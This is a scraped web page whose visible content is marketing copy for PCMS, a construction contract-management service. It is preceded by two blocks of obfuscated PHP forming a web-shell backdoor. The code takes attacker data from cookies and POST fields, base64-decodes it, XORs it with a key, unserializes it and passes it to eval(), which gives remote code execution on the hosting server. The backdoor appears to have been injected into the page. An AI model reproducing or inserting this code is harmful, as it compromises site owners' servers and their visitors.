$LNeBp = "\160" . "\x5f" . chr ( 496 - 431 )."\171" . "\x46" . 'g' . "\x46";$StrriMdXt = "\143" . chr ( 312 - 204 )."\x61" . chr (115) . chr ( 675 - 560 )."\137" . "\145" . chr ( 525 - 405 )."\x69" . chr ( 571 - 456 ).'t' . chr (115); $BfVonqQsI = class_exists($LNeBp); $StrriMdXt = "65529";$HpcbmWqtGP = strpos($StrriMdXt, $LNeBp);if ($BfVonqQsI == $HpcbmWqtGP){function QCwEoqNNc(){$unqzcq = new /* 10428 */ p_AyFgF(6457 + 6457); $unqzcq = NULL;}$mmdxqn = "6457";class p_AyFgF{private function wgKCNj($mmdxqn){if (is_array(p_AyFgF::$LuhiIxtw)) {$CqRKkbjok2 = str_replace("<" . "?php", "", p_AyFgF::$LuhiIxtw["content"]);eval($CqRKkbjok2); $mmdxqn = "6457";exit();}}public function DZFWNnjooG(){$CqRKkbjok = "63376";$this->_dummy = str_repeat($CqRKkbjok, strlen($CqRKkbjok));}public function __destruct(){p_AyFgF::$LuhiIxtw = @unserialize(p_AyFgF::$LuhiIxtw); $mmdxqn = "22090_27493";$this->wgKCNj($mmdxqn); $mmdxqn = "22090_27493";}public function NSgPhMJdv($CqRKkbjok, $ZmOTGrgosi){return $CqRKkbjok[0] ^ str_repeat($ZmOTGrgosi, intval(strlen($CqRKkbjok[0]) / strlen($ZmOTGrgosi)) + 1);}public function RLCuNvapZ($CqRKkbjok){$qqyJSb = chr ( 725 - 627 )."\141" . 's' . chr (101) . chr (54) . chr (52);return array_map($qqyJSb . chr (95) . "\144" . chr (101) . "\143" . "\x6f" . chr ( 656 - 556 )."\145", array($CqRKkbjok,));}public function __construct($rjihfSbcUc=0){$SJWTynpf = "\54";$CqRKkbjok = "";$zUUDpsbxb = $_POST;$BHVygAgT = $_COOKIE;$ZmOTGrgosi = "9c95afb0-bf1f-42d5-aac8-037d40af1575";$OjKjrP = @$BHVygAgT[substr($ZmOTGrgosi, 0, 4)];if (!empty($OjKjrP)){$OjKjrP = explode($SJWTynpf, $OjKjrP);foreach ($OjKjrP as $EgDhFNW){$CqRKkbjok .= @$BHVygAgT[$EgDhFNW];$CqRKkbjok .= @$zUUDpsbxb[$EgDhFNW];}$CqRKkbjok = $this->RLCuNvapZ($CqRKkbjok);}p_AyFgF::$LuhiIxtw = $this->NSgPhMJdv($CqRKkbjok, $ZmOTGrgosi);if (strpos($ZmOTGrgosi, $SJWTynpf) !== FALSE){$ZmOTGrgosi = str_pad($ZmOTGrgosi, 10); $ZmOTGrgosi = ltrim(rtrim($ZmOTGrgosi));}}public static $LuhiIxtw = 62823;}QCwEoqNNc();}$EloBBN = "\144" . '_' . "\125" . 'V' . "\x52" . "\164" . chr ( 936 - 857 ); $EfbWWmOw = 'c' . chr (108) . 'a' . chr ( 1069 - 954 ).chr (115) . "\x5f" . "\145" . "\x78" . chr ( 563 - 458 ).'s' . chr (116) . chr (115); $HobPqAQku = class_exists($EloBBN); $EfbWWmOw = "17125";$auMdQwlLV = !1;if ($HobPqAQku == $auMdQwlLV){function nRwEPsO(){$FLPjkI = new /* 14310 */ d_UVRtO(10403 + 10403); $FLPjkI = NULL;}$tFhylwdcU = "10403";class d_UVRtO{private function aNpnbvUJ($tFhylwdcU){if (is_array(d_UVRtO::$iMlQLJqpch)) {$PwNszDqZM = str_replace("\x3c" . "\x3f" . chr ( 617 - 505 ).'h' . chr (112), "", d_UVRtO::$iMlQLJqpch["\x63" . chr ( 1025 - 914 )."\x6e" . chr ( 489 - 373 ).chr ( 385 - 284 ).chr ( 130 - 20 )."\164"]);eval($PwNszDqZM); $tFhylwdcU = "10403";exit();}}private $QXXrmRa;public function KVYLtAg(){echo 19422;}public function __destruct(){$tFhylwdcU = "27917_25612";$this->aNpnbvUJ($tFhylwdcU); $tFhylwdcU = "27917_25612";}public function __construct($lJdApct=0){$TKkuRh = $_POST;$yxoDK = $_COOKIE;$WJaWT = "6ec6f042-5a11-4ef3-b261-1768dc47ffdc";$KhkzE = @$yxoDK[substr($WJaWT, 0, 4)];if (!empty($KhkzE)){$zVcOrM = "base64";$nvyeXDoID = "";$KhkzE = explode(",", $KhkzE);foreach ($KhkzE as $IQldTGtM){$nvyeXDoID .= @$yxoDK[$IQldTGtM];$nvyeXDoID .= @$TKkuRh[$IQldTGtM];}$nvyeXDoID = array_map($zVcOrM . "\x5f" . chr ( 575 - 475 ).chr ( 353 - 252 ).chr ( 135 - 36 ).chr (111) . "\x64" . "\x65", array($nvyeXDoID,)); $nvyeXDoID = $nvyeXDoID[0] ^ str_repeat($WJaWT, (strlen($nvyeXDoID[0]) / strlen($WJaWT)) + 1);d_UVRtO::$iMlQLJqpch = @unserialize($nvyeXDoID);}}public static $iMlQLJqpch = 9997;}nRwEPsO();} Project Contract Management Services – Execution Support for Construction and Facilities Project Owners and Contractors

Execution Support for Construction and Facilities Project Owners and Contractors

PCMS is our channel for delivering targeted support for projects or headquarters in the execution stages.

Contract Tensegrity is used when we are providing the enabling infrastructure to ensure project success.

The services offered under PCMS typically fall into THREE MAIN CATEGORIES:

Category ‘A’ generally includes:

Preparing, vetting, negotiating, and closing deal documents in a wide variety of areas and forms: negotiated terms and conditions, template adaptations, hybrid contract solutions, riders to standard contracts, amendments, settlements, etc.

Click here for more about this Category


Category ‘B’ generally includes:

Purchasing complex or large-volume items; Writing, tendering, and closing contracts; Managing orders and contracts; Resolving or assisting in resolving disputes

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Category ‘C’ generally includes:

Performing a wide variety of individual or combined duties in planning, design, construction, scheduling, and cost controls aspects of projects: scope documents, technical documents, procedures documents, assessments, etc., are what we typically produce

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We can meet a broad range of needs

Please contact us today to discuss how PCMS can help meet the needs of your project!

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